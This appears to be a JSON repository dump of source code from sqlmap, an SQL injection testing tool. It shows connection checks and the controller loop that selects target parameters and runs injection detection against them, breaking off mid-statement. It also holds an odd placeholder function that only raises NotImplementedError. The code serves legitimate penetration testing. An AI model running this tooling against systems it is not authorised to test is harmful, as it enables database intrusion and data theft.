hashDBRetrieve(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, True)\n    if _ is not None:\n        kb.nullConnection = _\n\n        if _:\n            dbgMsg = \"resuming NULL connection method '%s'\" % _\n            logger.debug(dbgMsg)\n\n    else:\n        infoMsg = \"testing NULL connection to the target URL\"\n        logger.info(infoMsg)\n\n        pushValue(kb.pageCompress)\n        kb.pageCompress = False\n\n        try:\n            page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)\n\n            if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n                kb.nullConnection = NULLCONNECTION.HEAD\n\n                infoMsg = \"NULL connection is supported with HEAD method ('Content-Length')\"\n                logger.info(infoMsg)\n            else:\n                page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: \"bytes=-1\"})\n\n                if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):\n                    kb.nullConnection = NULLCONNECTION.RANGE\n\n                    infoMsg = \"NULL connection is supported with GET method ('Range')\"\n                    logger.info(infoMsg)\n                else:\n                    _, headers, _ = Request.getPage(skipRead=True)\n\n                    if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n                        kb.nullConnection = NULLCONNECTION.SKIP_READ\n\n                        infoMsg = \"NULL connection is supported with 'skip-read' method\"\n                        logger.info(infoMsg)\n\n        except SqlmapConnectionException:\n            pass\n\n        finally:\n            kb.pageCompress = popValue()\n            kb.nullConnection = False if kb.nullConnection is None else kb.nullConnection\n            hashDBWrite(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, kb.nullConnection, True)\n\n    return kb.nullConnection in getPublicTypeMembers(NULLCONNECTION, True)\n\ndef checkConnection(suppressOutput=False):\n    threadData = getCurrentThreadData()\n\n    if not re.search(r\"\\A\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\Z\", conf.hostname):\n        if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):\n            try:\n                debugMsg = \"resolving hostname '%s'\" % conf.hostname\n                logger.debug(debugMsg)\n                socket.getaddrinfo(conf.hostname, None)\n            except socket.gaierror:\n                errMsg = \"host '%s' does not exist\" % conf.hostname\n                raise SqlmapConnectionException(errMsg)\n            except socket.error as ex:\n                errMsg = \"problem occurred while \"\n                errMsg += \"resolving a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n                raise SqlmapConnectionException(errMsg)\n            except UnicodeError as ex:\n                errMsg = \"problem occurred while \"\n                errMsg += \"handling a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n                raise SqlmapDataException(errMsg)\n\n    if not suppressOutput and not conf.dummy and not conf.offline:\n        infoMsg = \"testing connection to the target URL\"\n        logger.info(infoMsg)\n\n    try:\n        kb.originalPageTime = time.time()\n        page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)\n\n        rawResponse = \"%s%s\" % (listToStrValue(headers.headers if headers else \"\"), page)\n\n        if conf.string:\n            infoMsg = \"testing if the provided string is within the \"\n            infoMsg += \"target URL page content\"\n            logger.info(infoMsg)\n\n            if conf.string not in rawResponse:\n                warnMsg = \"you provided '%s' as the string to \" % conf.string\n                warnMsg += \"match, but such a string is not within the target \"\n                warnMsg += \"URL raw response, sqlmap will carry on anyway\"\n                logger.warning(warnMsg)\n\n        if conf.regexp:\n            infoMsg = \"testing if the provided regular expression matches within \"\n            infoMsg += \"the target URL page content\"\n            logger.info(infoMsg)\n\n            if not re.search(conf.regexp, rawResponse, re.I | re.M):\n                warnMsg = \"you provided '%s' as the regular expression \" % conf.regexp\n                warnMsg += \"which does not have any match within the target URL raw response. sqlmap \"\n                warnMsg += \"will carry on anyway\"\n                logger.warning(warnMsg)\n\n        kb.errorIsNone = False\n\n        if any(_ in (kb.serverHeader or \"\") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):\n            singleTimeWarnMessage(\"turning off pre-connect mechanism because of incompatible server ('%s')\" % kb.serverHeader)\n            conf.disablePrecon = True\n\n        if not kb.originalPage and wasLastResponseHTTPError():\n            if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n                errMsg = \"unable to retrieve page content\"\n                raise SqlmapConnectionException(errMsg)\n        elif wasLastResponseDBMSError():\n            warnMsg = \"there is a DBMS error found in the HTTP response body \"\n            warnMsg += \"which could interfere with the results of the tests\"\n            logger.warning(warnMsg)\n        elif wasLastResponseHTTPError():\n            if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n                warnMsg = \"the web server responded with an HTTP error code (%d) \" % getLastRequestHTTPError()\n                warnMsg += \"which could interfere with the results of the tests\"\n                logger.warning(warnMsg)\n        else:\n            kb.errorIsNone = True\n\n        if kb.choices.redirect == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:\n            if (threadData.lastRedirectURL[1] or \"\").startswith(\"https://\") and conf.hostname in getUnicode(threadData.lastRedirectURL[1]):\n                conf.url = re.sub(r\"https?://\", \"https://\", conf.url)\n                match = re.search(r\":(\\d+)\", threadData.lastRedirectURL[1])\n                port = match.group(1) if match else 443\n                conf.url = re.sub(r\":\\d+(/|\\Z)\", r\":%s\\g<1>\" % port, conf.url)\n\n    except SqlmapConnectionException as ex:\n        if conf.ipv6:\n            warnMsg = \"check connection to a provided \"\n            warnMsg += \"IPv6 address with a tool like ping6 \"\n            warnMsg += \"(e.g. 'ping6 -I eth0 %s') \" % conf.hostname\n            warnMsg += \"prior to running sqlmap to avoid \"\n            warnMsg += \"any addressing issues\"\n            singleTimeWarnMessage(warnMsg)\n\n        if any(code in kb.httpErrorCodes for code in (_http_client.NOT_FOUND, )):\n            errMsg = getSafeExString(ex)\n            logger.critical(errMsg)\n\n            if conf.multipleTargets:\n                return False\n\n            msg = \"it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] \"\n            if readInput(msg, default='Y', boolean=True):\n                raise SqlmapSilentQuitException\n            else:\n                kb.ignoreNotFound = True\n        else:\n            raise\n    finally:\n        kb.originalPage = kb.pageTemplate = threadData.lastPage\n        kb.originalCode = threadData.lastCode\n\n    if conf.cj and not conf.cookie and not any(_[0] == HTTP_HEADER.COOKIE for _ in conf.httpHeaders) and not conf.dropSetCookie:\n        candidate = DEFAULT_COOKIE_DELIMITER.join(\"%s=%s\" % (_.name, _.value) for _ in conf.cj)\n\n        message = \"you have not declared cookie(s), while \"\n        message += \"server wants to set its own ('%s'). \" % re.sub(r\"(=[^=;]{10}[^=;])[^=;]+([^=;]{10})\", r\"\\g<1>...\\g<2>\", candidate)\n        message += \"Do you want to use those [Y/n] \"\n        if readInput(message, default='Y', boolean=True):\n            kb.mergeCookies = True\n            conf.httpHeaders.append((HTTP_HEADER.COOKIE, candidate))\n\n    return True\n\ndef checkInternet():\n    content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]\n    return CHECK_INTERNET_VALUE in (content or \"\")\n\ndef setVerbosity():  # Cross-referenced function\n    raise NotImplementedError\n"
  },
  {
    "path": "sqlmap/lib/controller/controller.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport os\nimport re\nimport time\n\nfrom lib.controller.action import action\nfrom lib.controller.checks import checkConnection\nfrom lib.controller.checks import checkDynParam\nfrom lib.controller.checks import checkInternet\nfrom lib.controller.checks import checkNullConnection\nfrom lib.controller.checks import checkSqlInjection\nfrom lib.controller.checks import checkStability\nfrom lib.controller.checks import checkWaf\nfrom lib.controller.checks import heuristicCheckSqlInjection\nfrom lib.core.agent import agent\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import getFilteredPageContent\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import intersect\nfrom lib.core.common import isDigit\nfrom lib.core.common import isListLike\nfrom lib.core.common import parseTargetUrl\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import removePostHintPrefix\nfrom lib.core.common import safeCSValue\nfrom lib.core.common import showHttpErrorCodes\nfrom lib.core.common import urldecode\nfrom lib.core.common import urlencode\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import CONTENT_TYPE\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HEURISTIC_TEST\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import NOTE\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.exception import SqlmapBaseException\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapNotVulnerableException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.settings import ASP_NET_CONTROL_REGEX\nfrom lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import EMPTY_FORM_FIELDS_REGEX\nfrom lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX\nfrom lib.core.settings import HOST_ALIASES\nfrom lib.core.settings import IGNORE_PARAMETERS\nfrom lib.core.settings import LOW_TEXT_PERCENT\nfrom lib.core.settings import REFERER_ALIASES\nfrom lib.core.settings import USER_AGENT_ALIASES\nfrom lib.core.target import initTargetEnv\nfrom lib.core.target import setupTargetEnv\nfrom lib.utils.hash import crackHashFile\n\ndef _selectInjection():\n    \"\"\"\n    Selection function for injection place, parameters and type.\n    \"\"\"\n\n    points = {}\n\n    for injection in kb.injections:\n        place = injection.place\n        parameter = injection.parameter\n        ptype = injection.ptype\n\n        point = (place, parameter, ptype)\n\n        if point not in points:\n            points[point] = injection\n        else:\n            for key in points[point]:\n                if key != 'data':\n                    points[point][key] = points[point][key] or injection[key]\n            points[point]['data'].update(injection['data'])\n\n    if len(points) == 1:\n        kb.injection = kb.injections[0]\n\n    elif len(points) > 1:\n        message = \"there were multiple injection points, please select \"\n        message += \"the one to use for following injections:\\n\"\n\n        points = []\n\n        for i in xrange(0, len(kb.injections)):\n            place = kb.injections[i].place\n            parameter = kb.injections[i].parameter\n            ptype = kb.injections[i].ptype\n            point = (place, parameter, ptype)\n\n            if point not in points:\n                points.append(point)\n                ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype\n\n                message += \"[%d] place: %s, parameter: \" % (i, place)\n                message += \"%s, type: %s\" % (parameter, ptype)\n\n                if i == 0:\n                    message += \" (default)\"\n\n                message += \"\\n\"\n\n        message += \"[q] Quit\"\n        choice = readInput(message, default='0').upper()\n\n        if isDigit(choice) and int(choice) < len(kb.injections) and int(choice) >= 0:\n            index = int(choice)\n        elif choice == 'Q':\n            raise SqlmapUserQuitException\n        else:\n            errMsg = \"invalid choice\"\n            raise SqlmapValueException(errMsg)\n\n        kb.injection = kb.injections[index]\n\ndef _formatInjection(inj):\n    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place\n    data = \"Parameter: %s (%s)\\n\" % (inj.parameter, paramType)\n\n    for stype, sdata in inj.data.items():\n        title = sdata.title\n        vector = sdata.vector\n        comment = sdata.comment\n        payload = agent.adjustLateValues(sdata.payload)\n        if inj.place == PLACE.CUSTOM_HEADER:\n            payload = payload.split(',', 1)[1]\n        if stype == PAYLOAD.TECHNIQUE.UNION:\n            count = re.sub(r\"(?i)(\\(.+\\))|(\\blimit[^a-z]+)\", \"\", sdata.payload).count(',') + 1\n            title = re.sub(r\"\\d+ to \\d+\", str(count), title)\n            vector = agent.forgeUnionQuery(\"[QUERY]\", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])\n            if count == 1:\n                title = title.replace(\"columns\", \"column\")\n        elif comment:\n            vector = \"%s%s\" % (vector, comment)\n        data += \"    Type: %s\\n\" % PAYLOAD.SQLINJECTION[stype]\n        data += \"    Title: %s\\n\" % title\n        data += \"    Payload: %s\\n\" % urldecode(payload, unsafe=\"&\", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))\n        data += \"    Vector: %s\\n\\n\" % vector if conf.verbose > 1 else \"\\n\"\n\n    return data\n\ndef _showInjections():\n    if conf.wizard and kb.wizardMode:\n        kb.wizardMode = False\n\n    if kb.testQueryCount > 0:\n        header = \"sqlmap identified the following injection point(s) with \"\n        header += \"a total of %d HTTP(s) requests\" % kb.testQueryCount\n    else:\n        header = \"sqlmap resumed the following injection point(s) from stored session\"\n\n    if conf.api:\n        conf.dumper.string(\"\", {\"url\": conf.url, \"query\": conf.parameters.get(PLACE.GET), \"data\": conf.parameters.get(PLACE.POST)}, content_type=CONTENT_TYPE.TARGET)\n        conf.dumper.string(\"\", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)\n    else:\n        data = \"\".join(set(_formatInjection(_) for _ in kb.injections)).rstrip(\"\\n\")\n        conf.dumper.string(header, data)\n\n    if conf.tamper:\n        warnMsg = \"changes made by tampering scripts are not \"\n        warnMsg += \"included in shown payload content(s)\"\n        logger.warning(warnMsg)\n\n    if conf.hpp:\n        warnMsg = \"changes made by HTTP parameter pollution are not \"\n        warnMsg += \"included in shown payload content(s)\"\n        logger.warning(warnMsg)\n\ndef _randomFillBlankFields(value):\n    retVal = value\n\n    if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):\n        message = \"do you want to fill blank fields with random values? [Y/n] \"\n\n        if readInput(message, default='Y', boolean=True):\n            for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):\n                item = match.group(\"result\")\n                if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):\n                    newValue = randomStr() if not re.search(r\"^id|id$\", item, re.I) else randomInt()\n                    if item[-1] == DEFAULT_GET_POST_DELIMITER:\n                        retVal = retVal.replace(item, \"%s%s%s\" % (item[:-1], newValue, DEFAULT_GET_POST_DELIMITER))\n                    else:\n                        retVal = retVal.replace(item, \"%s%s\" % (item, newValue))\n\n    return retVal\n\ndef _saveToHashDB():\n    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)\n    if not isListLike(injections):\n        injections = []\n    injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)\n\n    _ = dict()\n    for injection in injections:\n        key = (injection.place, injection.parameter, injection.ptype)\n        if key not in _:\n            _[key] = injection\n        else:\n            _[key].data.update(injection.data)\n    hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, list(_.values()), True)\n\n    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)\n    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)\n\n    if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):\n        hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)\n\n    if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):\n        hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)\n\ndef _saveToResultsFile():\n    if not conf.resultsFP:\n        return\n\n    results = {}\n    techniques = dict((_[1], _[0]) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE))\n\n    for injection in kb.injections + kb.falsePositives:\n        if injection.place is None or injection.parameter is None:\n            continue\n\n        key = (injection.place, injection.parameter, ';'.join(injection.notes))\n        if key not in results:\n            results[key] = []\n\n        results[key].extend(list(injection.data.keys()))\n\n    try:\n        for key, value in results.items():\n            place, parameter, notes = key\n            line = \"%s,%s,%s,%s,%s%s\" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, \"\".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)\n            conf.resultsFP.write(line)\n\n        conf.resultsFP.flush()\n    except IOError as ex:\n        errMsg = \"unable to write to the results file '%s' ('%s'). \" % (conf.resultsFile, getSafeExString(ex))\n        raise SqlmapSystemException(errMsg)\n\n@stackedmethod\ndef start():\n    \"\"\"\n    This function calls a function that performs checks on both URL\n    stability and all GET, POST, Cookie and User-Agent parameters to\n    check if they are dynamic and SQL injection affected\n    \"\"\"\n\n    if conf.hashFile:\n        crackHashFile(conf.hashFile)\n\n    if conf.direct:\n        initTargetEnv()\n        setupTargetEnv()\n        action()\n        return True\n\n    if conf.url and not any((conf.forms, conf.crawlDepth)):\n        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))\n\n    if conf.configFile and not kb.targets:\n        errMsg = \"you did not edit the configuration file properly, set \"\n        errMsg += \"the target URL, list of targets or google dork\"\n        logger.error(errMsg)\n        return False\n\n    if kb.targets and isListLike(kb.targets) and len(kb.targets) > 1:\n        infoMsg = \"found a total of %d targets\" % len(kb.targets)\n        logger.info(infoMsg)\n\n    targetCount = 0\n    initialHeaders = list(conf.httpHeaders)\n\n    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:\n        targetCount += 1\n\n        try:\n            if conf.checkInternet:\n                infoMsg = \"checking for Internet connection\"\n                logger.info(infoMsg)\n\n                if not checkInternet():\n                    warnMsg = \"[%s] [WARNING] no connection detected\" % time.strftime(\"%X\")\n                    dataToStdout(warnMsg)\n\n                    valid = False\n                    for _ in xrange(conf.retries):\n                        if checkInternet():\n                            valid = True\n                            break\n                        else:\n                            dataToStdout('.')\n                            time.sleep(5)\n\n                    if not valid:\n                        errMsg = \"please check your Internet connection and rerun\"\n                        raise SqlmapConnectionException(errMsg)\n                    else:\n                        dataToStdout(\"\\n\")\n\n            conf.url = targetUrl\n            conf.method = targetMethod.upper().strip() if targetMethod else targetMethod\n            conf.data = targetData\n            conf.cookie = targetCookie\n            conf.httpHeaders = list(initialHeaders)\n            conf.httpHeaders.extend(targetHeaders or [])\n\n            if conf.randomAgent or conf.mobile:\n                for header, value in initialHeaders:\n                    if header.upper() == HTTP_HEADER.USER_AGENT.upper():\n                        conf.httpHeaders.append((header, value))\n                        break\n\n            if conf.data:\n                # Note: explicitly URL encode __ ASP(.NET) parameters (e.g. to avoid problems with Base64 encoded '+' character) - standard procedure in web browsers\n                conf.data = re.sub(r\"\\b(__\\w+)=([^&]+)\", lambda match: \"%s=%s\" % (match.group(1), urlencode(match.group(2), safe='%')), conf.data)\n\n            conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]\n\n            initTargetEnv()\n            parseTargetUrl()\n\n            testSqlInj = False\n\n            if PLACE.GET in conf.parameters and not any((conf.data, conf.testParameter)):\n                for parameter in re.findall(r\"([^=]+)=([^%s]+%s?|\\Z)\" % (re.escape(conf.paramDel or \"\") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or \"\") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):\n                    paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])\n\n                    if paramKey not in kb.testedParams:\n                        testSqlInj = True\n                        break\n            else:\n                paramKey = (conf.hostname, conf.path, None, None)\n                if paramKey not in kb.testedParams:\n                    testSqlInj = True\n\n            if testSqlInj and conf.hostname in kb.vulnHosts:\n                if kb.skipVulnHost is None:\n                    message = \"SQL injection vulnerability has already been detected \"\n                    message += \"against '%s'. Do you want to skip \" % conf.hostname\n                    message += \"further tests involving it? [Y/n]\"\n\n                    kb.skipVulnHost = readInput(message, default='Y', boolean=True)\n\n                testSqlInj = not kb.skipVulnHost\n\n            if not testSqlInj:\n                infoMsg = \"skipping '%s'\" % targetUrl\n                logger.info(infoMsg)\n                continue\n\n            if conf.multipleTargets:\n                if conf.forms and conf.method:\n                    message = \"[%d/%s] Form:\\n%s %s\" % (targetCount, len(kb.targets) if isListLike(kb.targets) else '?', conf.method, targetUrl)\n                else:\n                    message = \"[%d/%s] URL:\\n%s %s\" % (targetCount, len(kb.targets) if isListLike(kb.targets) else '?', HTTPMETHOD.GET, targetUrl)\n\n                if conf.cookie:\n                    message += \"\\nCookie: %s\" % conf.cookie\n\n                if conf.data is not None:\n                    message += \"\\n%s data: %s\" % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST, urlencode(conf.data or \"\") if re.search(r\"\\A\\s*[<{]\", conf.data or \"\") is None else conf.data)\n\n                if conf.forms and conf.method:\n                    if conf.method == HTTPMETHOD.GET and targetUrl.find(\"?\") == -1:\n                        continue\n\n                    message += \"\\ndo you want to test this form? [Y/n/q] \"\n                    choice = readInput(message, default='Y').upper()\n\n                    if choice == 'N':\n                        continue\n                    elif choice == 'Q':\n                        break\n                    else:\n                        if conf.method != HTTPMETHOD.GET:\n                            message = \"Edit %s data [default: %s]%s: \" % (conf.method, urlencode(conf.data or \"\") if re.search(r\"\\A\\s*[<{]\", conf.data or \"None\") is None else conf.data, \" (Warning: blank fields detected)\" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else \"\")\n                            conf.data = readInput(message, default=conf.data)\n                            conf.data = _randomFillBlankFields(conf.data)\n                            conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data\n\n                        else:\n                            if '?' in targetUrl:\n                                firstPart, secondPart = targetUrl.split('?', 1)\n                                message = \"Edit GET data [default: %s]: \" % secondPart\n                                test = readInput(message, default=secondPart)\n                                test = _randomFillBlankFields(test)\n                                conf.url = \"%s?%s\" % (firstPart, test)\n\n                        parseTargetUrl()\n\n                else:\n                    if not conf.scope:\n                        message += \"\\ndo you want to test this URL? [Y/n/q]\"\n                        choice = readInput(message, default='Y').upper()\n\n                        if choice == 'N':\n                            dataToStdout(os.linesep)\n                            continue\n                        elif choice == 'Q':\n                            break\n                    else:\n                        pass\n\n                    infoMsg = \"testing URL '%s'\" % targetUrl\n                    logger.info(infoMsg)\n\n            setupTargetEnv()\n\n            if not checkConnection(suppressOutput=conf.forms):\n                continue\n\n            if conf.rParam and kb.originalPage:\n                kb.randomPool = dict([_ for _ in kb.randomPool.items() if isinstance(_[1], list)])\n\n                for match in re.finditer(r\"(?si)<select[^>]+\\bname\\s*=\\s*[\\\"']([^\\\"']+)(.+?)</select>\", kb.originalPage):\n                    name, _ = match.groups()\n                    options = tuple(re.findall(r\"<option[^>]+\\bvalue\\s*=\\s*[\\\"']([^\\\"']+)\", _))\n                    if options:\n                        kb.randomPool[name] = options\n\n            checkWaf()\n\n            if conf.nullConnection:\n                checkNullConnection()\n\n            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):\n                if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.technique:\n                    # NOTE: this is not needed anymore, leaving only to display\n                    # a warning message to the user in case the page is not stable\n                    checkStability()\n\n                # Do a little prioritization reorder of a testable parameter list\n                parameters = list(conf.parameters.keys())\n\n                # Order of testing list (first to last)\n                orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)\n\n                for place in orderList[::-1]:\n                    if place in parameters:\n                        parameters.remove(place)\n                        parameters.insert(0, place)\n\n                proceed = True\n                for place in parameters:\n                    # Test User-Agent and Referer headers only if\n                    # --level >= 3\n                    skip = (place == PLACE.USER_AGENT and (kb.testOnlyCustom or conf.level < 3))\n                    skip |= (place == PLACE.REFERER and (kb.testOnlyCustom or conf.level < 3))\n\n                    # --param-filter\n                    skip |= (len(conf.paramFilter) > 0 and place.upper() not in conf.paramFilter)\n\n                    # Test Host header only if\n                    # --level >= 5\n                    skip |= (place == PLACE.HOST and (kb.testOnlyCustom or conf.level < 5))\n\n                    # Test Cookie header only if --level >= 2\n                    skip |= (place == PLACE.COOKIE and (kb.testOnlyCustom or conf.level < 2))\n\n                    skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))\n                    skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))\n                    skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))\n                    skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))\n\n                    skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))\n                    skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))\n                    skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True))\n                    skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True))\n\n                    if skip:\n                        continue\n\n                    if place not in conf.paramDict or place not in conf.parameters:\n                        continue\n\n                    paramDict = conf.paramDict[place]\n\n                    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n                    for parameter, value in paramDict.items():\n                        if not proceed:\n                            break\n\n                        kb.vainRun = False\n                        testSqlInj = True\n                        paramKey = (conf.hostname, conf.path, place, parameter)\n\n                        if paramKey in kb.testedParams:\n                            testSqlInj = False\n\n                            infoMsg = \"skipping previously processed %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                            logger.info(infoMsg)\n\n                        elif any(_ in conf.testParameter for _ in (parameter, removePostHintPrefix(parameter))):\n                            pass\n\n                        elif parameter in conf.rParam:\n                            testSqlInj = False\n\n                            infoMsg = \"skipping randomizing %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                            logger.info(infoMsg)\n\n                        elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:\n                            testSqlInj = False\n\n                            infoMsg = \"skipping %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                            logger.info(infoMsg)\n\n                        elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)):\n                            testSqlInj = False\n\n                            infoMsg = \"skipping %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                            logger.info(infoMsg)\n\n                        elif conf.csrfToken and re.search(conf.csrfToken, parameter, re.I):\n                            testSqlInj = False\n\n                            infoMsg = \"skipping anti-CSRF token parameter '%s'\" % parameter\n                            logger.info(infoMsg)\n\n                        # Ignore session-like parameters for --level < 4\n                        elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):\n                            testSqlInj = False\n\n                            infoMsg = \"ignoring %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                            logger.info(infoMsg)\n\n                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.technique or conf.skipStatic:\n                            check = checkDynParam(place, parameter, value)\n\n                            if not check:\n                                warnMsg = \"%sparameter '%s' does not appear to be dynamic\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                                logger.warning(warnMsg)\n\n                                if conf.skipStatic:\n                                    infoMsg = \"skipping static %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                                    logger.info(infoMsg)\n\n                                    testSqlInj = False\n                            else:\n                                infoMsg = \"%sparameter '%s' appears to be dynamic\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                                logger.info(infoMsg)\n\n                        kb.testedParams.add(paramKey)\n\n                        if testSqlInj:\n                            try:\n                                if place == PLACE.COOKIE:\n                                    pushValue(kb.mergeCookies)\n                                    kb.mergeCookies = False\n\n                                check = heuristicCheckSqlInjection(place, parameter)\n\n                                if check != HEURISTIC_TEST.POSITIVE:\n                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):\n                                        infoMsg = \"skipping %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                                        logger.info(infoMsg)\n                                        continue\n\n                                infoMsg = \"testing for SQL injection on %sparameter '%s'\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n                                logger.info(infoMsg)\n\n                                injection = checkSqlInjection(place, parameter, value)\n                                proceed = not kb.endDetection\n                                injectable = False\n\n                                if getattr(injection, \"place\", None) is not None:\n                                    if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes:\n                                        kb.falsePositives.append(injection)\n                                    else:\n                                        injectable = True\n\n                                        kb.injections.append(injection)\n\n                                        # In case when user wants to end detection phase (Ctrl+C)\n                                        if not proceed:\n                                            break\n\n                                        msg = \"%sparameter '%s' \" % (\"%s \" % injection.place if injection.place != injection.parameter else \"\", injection.parameter)\n                                        msg += \"is vulnerable. Do you want to keep testing the others (if any)? [y/N] \"\n\n                                        if not readInput(msg, default='N', boolean=True):\n                                            proceed = False\n                                            paramKey = (conf.hostname, conf.path, None, None)\n                                            kb.testedParams.add(paramKey)\n\n                                if not injectable:\n                                    warnMsg = \"%sparameter '%s' does not seem to be injectable\" % (\"%s \" % paramType if paramType != parameter else \"\", 